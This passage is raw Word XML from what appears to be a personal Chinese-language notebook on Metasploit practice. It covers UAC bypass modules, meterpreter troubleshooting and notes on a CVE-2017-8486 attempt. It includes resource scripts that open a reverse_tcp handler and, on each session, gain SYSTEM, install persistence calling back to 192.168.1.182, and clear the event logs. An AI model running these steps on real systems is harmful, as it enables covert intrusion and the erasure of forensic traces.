      </w:r>
      <w:r w:rsidR="004A4528">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows</w:t>
      </w:r>
      <w:r w:rsidR="004A4528">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="004A4528">
        <w:t>也会自动开启一个反向</w:t>
      </w:r>
      <w:r w:rsidR="004A4528">
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidR="004A4528">
        <w:t>连接</w:t>
      </w:r>
      <w:r w:rsidR="00692327">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00692327">
        <w:t>这个</w:t>
      </w:r>
      <w:r w:rsidR="00692327">
        <w:t xml:space="preserve">module </w:t>
      </w:r>
      <w:r w:rsidR="00692327">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00692327">
        <w:t>bypass Microsoft's User Access Control function on Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177">
      <w:r>
        <w:t>msf exploit(bypassuac_fodhelper) &gt; search bypassuac</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177"/>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177">
      <w:r>
        <w:t>Matching Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177">
      <w:r>
        <w:t>================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177">
      <w:r>
        <w:t xml:space="preserve">   Name                                       Disclosure Date  Rank       Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177">
      <w:r>
        <w:t xml:space="preserve">   ----                                       ---------------  ----       -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177">
      <w:r>
        <w:t xml:space="preserve">   exploit/windows/local/bypassuac            2010-12-31       excellent  Windows Escalate UAC Protection Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="006767F6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exploit/windows/local/bypassuac_eventvwr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   2016-08-15       excellent  Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE5971">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exploit/windows/local/bypassuac_fodhelper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  2017-05-12       excellent  Windows UAC Protection Bypass (Via FodHelper Registry Key)</w:t>
      </w:r>
      <w:r w:rsidR="009930D9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="009930D9" w:rsidRPr="003B5850">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidR="009930D9" w:rsidRPr="003B5850">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>win10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177">
      <w:r>
        <w:t xml:space="preserve">   exploit/windows/local/bypassuac_injection  2010-12-31       excellent  Windows Escalate UAC Protection Bypass (In Memory Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00796177" w:rsidRDefault="00796177" w:rsidP="00796177">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="006767F6">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exploit/windows/local/bypassuac_vbs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        2015-08-22       excellent  Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)</w:t>
      </w:r>
      <w:r w:rsidR="006767F6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006767F6">
        <w:t>这个没有设置</w:t>
      </w:r>
      <w:r w:rsidR="006767F6">
        <w:t>PAYLOAD</w:t>
      </w:r>
      <w:r w:rsidR="006767F6">
        <w:t>但是使用了</w:t>
      </w:r>
      <w:r w:rsidR="006767F6">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidR="006767F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006767F6">
        <w:t>并且原本一直说因为环境不对的</w:t>
      </w:r>
      <w:r w:rsidR="006767F6">
        <w:t>getsystem</w:t>
      </w:r>
      <w:r w:rsidR="006767F6">
        <w:t>已经可以了</w:t>
      </w:r>
      <w:r w:rsidR="006767F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E93900" w:rsidRDefault="00E93900" w:rsidP="000D3F01"/>
    <w:p w:rsidR="002005C6" w:rsidRPr="00E93900" w:rsidRDefault="00565A4D" w:rsidP="000D3F01">
      <w:r w:rsidRPr="00565A4D">
        <w:t>show info</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>看到比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">show options </w:t>
      </w:r>
      <w:r>
        <w:t>看多的信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D345E" w:rsidRDefault="005D345E" w:rsidP="005D345E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Available targets:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D345E" w:rsidRDefault="005D345E" w:rsidP="005D345E">
      <w:r>
        <w:t xml:space="preserve">  Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D345E" w:rsidRDefault="005D345E" w:rsidP="005D345E">
      <w:r>
        <w:t xml:space="preserve">  --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D345E" w:rsidRDefault="005D345E" w:rsidP="005D345E">
      <w:r>
        <w:t xml:space="preserve">  0   Windows x86</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D345E" w:rsidRDefault="005D345E" w:rsidP="000D3F01">
      <w:r>
        <w:t xml:space="preserve">  1   Windows x64</w:t>
      </w:r>
      <w:r w:rsidR="009D699E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D699E">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="009D699E">
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>set target</w:t>
      </w:r>
      <w:r>
        <w:t>来选择</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D345E" w:rsidRDefault="005D345E" w:rsidP="000D3F01"/>
    <w:p w:rsidR="002005C6" w:rsidRDefault="002005C6" w:rsidP="000D3F01">
      <w:r>
        <w:t>有时候命令会莫名其妙地失效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再执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002005C6" w:rsidRDefault="002005C6" w:rsidP="002005C6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="002005C6">
        <w:t>screenshot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>遇到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TimeoutError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002005C6" w:rsidRDefault="002005C6" w:rsidP="002005C6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>刚开</w:t>
      </w:r>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t>遇到</w:t>
      </w:r>
      <w:r>
        <w:t>Unknown command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002005C6" w:rsidRDefault="006D57FE" w:rsidP="000D3F01">
      <w:r w:rsidRPr="006D57FE">
        <w:t>Exploit completed, but no session was created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能成功顺利地执行不代表就能攻击成功，没攻击成功就不会返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E8057F" w:rsidRDefault="00E8057F" w:rsidP="000D3F01"/>
    <w:p w:rsidR="0013736A" w:rsidRDefault="005D4554" w:rsidP="000D3F01">
      <w:r>
        <w:t>第一次遇见这么奇怪的事情</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>cve-2017-8486</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">set PAYLOAD windows/exec </w:t>
      </w:r>
      <w:r>
        <w:t>并</w:t>
      </w:r>
      <w:r>
        <w:t>set CMD calc</w:t>
      </w:r>
      <w:r>
        <w:t>但是就是不起作用在</w:t>
      </w:r>
      <w:r>
        <w:t>WIn7 SP1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>放到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp pro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就好了。</w:t>
      </w:r>
      <w:r w:rsidR="00A82462">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="00A82462">
        <w:t>_tcp</w:t>
      </w:r>
      <w:r w:rsidR="00A82462">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00A82462">
        <w:t>win7</w:t>
      </w:r>
      <w:r w:rsidR="00A82462">
        <w:t>中倒是没问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1560" w:rsidRDefault="002F1560" w:rsidP="000D3F01"/>
    <w:p w:rsidR="002F1560" w:rsidRDefault="002F1560" w:rsidP="000D3F01">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时开着几个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候，一下子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>500M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存没有了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="000D3F01"/>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:r>
        <w:t>msfBegin.rc:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>set lhost 192.168.1.182</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>set lport 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidR="00D83B48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>xit</w:t>
      </w:r>
      <w:r w:rsidR="00D83B48">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>nsession false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>set autorunscript multi_console_command -cr "/root/msf.rc"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>exploit –j</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:r>
        <w:t>/root/msf.rc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>migrate -N explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>run metsvc -A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>run persistence -U -r 192.168.1.182 -p 4444 -i 30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008344BF" w:rsidRDefault="008344BF" w:rsidP="008344BF">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
      </w:pPr>
      <w:r>
        <w:t>clearev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4DE1" w:rsidRDefault="008E4DE1" w:rsidP="008E4DE1">
      <w:r>
        <w:t>想云服务器这样内外网</w:t>
      </w:r>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，应将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0.0.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00532330" w:rsidRDefault="00532330" w:rsidP="008E4DE1"/>
    <w:p w:rsidR="00532330" w:rsidRDefault="00532330" w:rsidP="008E4DE1">
      <w:r>
        <w:t>意外发现</w:t>
      </w:r>
      <w:r>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:t>不能用来维持</w:t>
      </w:r>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:r>
        <w:t>的会话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>一旦处于</w:t>
      </w:r>
      <w:r>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:t>的环境中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:r>
        <w:t>就不能开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00623E4E" w:rsidRDefault="00623E4E" w:rsidP="008E4DE1"/>
    <w:p w:rsidR="00623E4E" w:rsidRDefault="00623E4E" w:rsidP="008E4DE1"/>
    <w:p w:rsidR="00623E4E" w:rsidRDefault="00623E4E" w:rsidP="008E4DE1">
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t>详细介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0A33" w:rsidRDefault="006E0A33" w:rsidP="008E4DE1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>这个程序执行的时候不会在硬盘上保存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00361D72">
        <w:t>所以直接</w:t>
      </w:r>
      <w:r w:rsidR="00361D72">
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>就可以去除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00623E4E" w:rsidRDefault="00623E4E" w:rsidP="008E4DE1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在别的</w:t>
      </w:r>
      <w:r>
        <w:t>线程里面执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通常</w:t>
      </w:r>
      <w:r>
        <w:t>不会接触到对磁盘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的读写（除非因为内存不够的分页）。</w:t>
      </w:r>
      <w:r w:rsidR="00835AF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于没有创建新进程，所以不需要考虑</w:t>
      </w:r>
      <w:r w:rsidR="00835AF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chroot</w:t>
      </w:r>
      <w:r w:rsidR="00835AF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024C10" w:rsidRPr="00623E4E" w:rsidRDefault="00024C10" w:rsidP="008E4DE1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:t>进行功能扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00B32C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B32C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00024C10" w:rsidRPr="00623E4E" w:rsidSect="00AF376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6B" w:rsidRDefault="00261B6B" w:rsidP="00134821">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00261B6B" w:rsidRDefault="00261B6B" w:rsidP="0013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6B" w:rsidRDefault="00261B6B" w:rsidP="00134821">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00261B6B" w:rsidRDefault="00261B6B" w:rsidP="0013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02785"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3923DD4"/>
    <w:lvl w:ilvl="0" w:tplc="D5A82482">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="36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DF"/>
    <w:rsid w:val="00001899"/>
    <w:rsid w:val="00001F61"/>
    <w:rsid w:val="00006664"/>
    <w:rsid w:val="00024C10"/>
    <w:rsid w:val="00050130"/>
    <w:rsid w:val="000518C9"/>
    <w:rsid w:val="00052074"/>
    <w:rsid w:val="00057680"/>
    <w:rsid w:val="00060314"/>
    <w:rsid w:val="00061E0B"/>
    <w:rsid w:val="0008142B"/>
    <w:rsid w:val="00081FF5"/>
    <w:rsid w:val="00096BE8"/>
    <w:rsid w:val="000A6A6C"/>
    <w:rsid w:val="000B0B4A"/>
    <w:rsid w:val="000C3F64"/>
    <w:rsid w:val="000C6CF5"/>
    <w:rsid w:val="000D36C2"/>
    <w:rsid w:val="000D3F01"/>
    <w:rsid w:val="000E286C"/>
    <w:rsid w:val="000F49DC"/>
    <w:rsid w:val="0010069B"/>
    <w:rsid w:val="001024B1"/>
    <w:rsid w:val="00104245"/>
    <w:rsid w:val="00113EC4"/>
    <w:rsid w:val="00115E76"/>
    <w:rsid w:val="00125A07"/>
    <w:rsid w:val="0013427B"/>
    <w:rsid w:val="00134821"/>
    <w:rsid w:val="0013736A"/>
    <w:rsid w:val="001459F1"/>
    <w:rsid w:val="001522D8"/>
    <w:rsid w:val="00161BCB"/>
    <w:rsid w:val="001643BE"/>
    <w:rsid w:val="00165BF6"/>
    <w:rsid w:val="0018560D"/>
    <w:rsid w:val="001D05EC"/>
    <w:rsid w:val="001D1596"/>
    <w:rsid w:val="001D38A1"/>
    <w:rsid w:val="001D4A66"/>
    <w:rsid w:val="001F6324"/>
    <w:rsid w:val="001F7024"/>
    <w:rsid w:val="002005C6"/>
    <w:rsid w:val="00201B8E"/>
    <w:rsid w:val="002023DC"/>
    <w:rsid w:val="00210451"/>
    <w:rsid w:val="00220A61"/>
    <w:rsid w:val="00233499"/>
    <w:rsid w:val="002334A9"/>
    <w:rsid w:val="0024477C"/>
    <w:rsid w:val="00244957"/>
    <w:rsid w:val="002531ED"/>
    <w:rsid w:val="002561CA"/>
    <w:rsid w:val="00261B6B"/>
    <w:rsid w:val="00274389"/>
    <w:rsid w:val="002779C9"/>
    <w:rsid w:val="00286C5A"/>
    <w:rsid w:val="00290703"/>
    <w:rsid w:val="00295A44"/>
    <w:rsid w:val="002A3638"/>
    <w:rsid w:val="002B225C"/>
    <w:rsid w:val="002C248A"/>
    <w:rsid w:val="002C2961"/>
    <w:rsid w:val="002D1214"/>
    <w:rsid w:val="002D14A6"/>
    <w:rsid w:val="002E2B8B"/>
    <w:rsid w:val="002F1560"/>
    <w:rsid w:val="002F6701"/>
    <w:rsid w:val="003043F6"/>
    <w:rsid w:val="00312B2F"/>
    <w:rsid w:val="00320F31"/>
    <w:rsid w:val="00326B7B"/>
    <w:rsid w:val="00332CC1"/>
    <w:rsid w:val="00333764"/>
    <w:rsid w:val="003371DB"/>
    <w:rsid w:val="0035367B"/>
    <w:rsid w:val="003540BA"/>
    <w:rsid w:val="00361D72"/>
    <w:rsid w:val="00361DD3"/>
    <w:rsid w:val="00367FFB"/>
    <w:rsid w:val="00382849"/>
    <w:rsid w:val="003832AB"/>
    <w:rsid w:val="0039538A"/>
    <w:rsid w:val="00395C7E"/>
    <w:rsid w:val="003A7760"/>
    <w:rsid w:val="003B5850"/>
    <w:rsid w:val="003D4126"/>
    <w:rsid w:val="003D67F5"/>
    <w:rsid w:val="003D73F9"/>
    <w:rsid w:val="003E1CBE"/>
    <w:rsid w:val="00410D6D"/>
    <w:rsid w:val="00420453"/>
    <w:rsid w:val="00425898"/>
    <w:rsid w:val="00427CF1"/>
    <w:rsid w:val="004405D3"/>
    <w:rsid w:val="00450B39"/>
    <w:rsid w:val="00491AE2"/>
    <w:rsid w:val="00494DF4"/>
    <w:rsid w:val="004950F7"/>
    <w:rsid w:val="004A4528"/>
    <w:rsid w:val="004B3E2C"/>
    <w:rsid w:val="004C2E59"/>
    <w:rsid w:val="004D59A1"/>
    <w:rsid w:val="004E0F9D"/>
    <w:rsid w:val="00517113"/>
    <w:rsid w:val="00520512"/>
    <w:rsid w:val="00521DD1"/>
    <w:rsid w:val="00525243"/>
    <w:rsid w:val="00525F3A"/>
    <w:rsid w:val="00532330"/>
    <w:rsid w:val="00541D4D"/>
    <w:rsid w:val="00542673"/>
    <w:rsid w:val="0054488D"/>
    <w:rsid w:val="00565A4D"/>
    <w:rsid w:val="0058226B"/>
    <w:rsid w:val="00583B8D"/>
    <w:rsid w:val="005A19C7"/>
    <w:rsid w:val="005A1BB6"/>
    <w:rsid w:val="005A280C"/>
    <w:rsid w:val="005A7662"/>
    <w:rsid w:val="005B2DA5"/>
    <w:rsid w:val="005B63AF"/>
    <w:rsid w:val="005D09E8"/>
    <w:rsid w:val="005D345E"/>
    <w:rsid w:val="005D4554"/>
    <w:rsid w:val="005D51B3"/>
    <w:rsid w:val="005D5318"/>
    <w:rsid w:val="005F0AFC"/>
    <w:rsid w:val="005F303A"/>
    <w:rsid w:val="006024D0"/>
    <w:rsid w:val="00603E79"/>
    <w:rsid w:val="00610327"/>
    <w:rsid w:val="00623E4E"/>
    <w:rsid w:val="0062573F"/>
    <w:rsid w:val="006415EC"/>
    <w:rsid w:val="006446BD"/>
    <w:rsid w:val="006500CF"/>
    <w:rsid w:val="006554AD"/>
    <w:rsid w:val="0065743A"/>
    <w:rsid w:val="00663596"/>
    <w:rsid w:val="006767F6"/>
    <w:rsid w:val="00680052"/>
    <w:rsid w:val="00692327"/>
    <w:rsid w:val="006A01C0"/>
    <w:rsid w:val="006A14E1"/>
    <w:rsid w:val="006A1FFC"/>
    <w:rsid w:val="006B510D"/>
    <w:rsid w:val="006B7628"/>
    <w:rsid w:val="006C7F52"/>
    <w:rsid w:val="006D57FE"/>
    <w:rsid w:val="006E0A33"/>
    <w:rsid w:val="006E28E3"/>
    <w:rsid w:val="006E78C4"/>
    <w:rsid w:val="006F0116"/>
    <w:rsid w:val="006F554C"/>
    <w:rsid w:val="006F7DD2"/>
    <w:rsid w:val="00706A25"/>
    <w:rsid w:val="007102D1"/>
    <w:rsid w:val="007257FE"/>
    <w:rsid w:val="00746882"/>
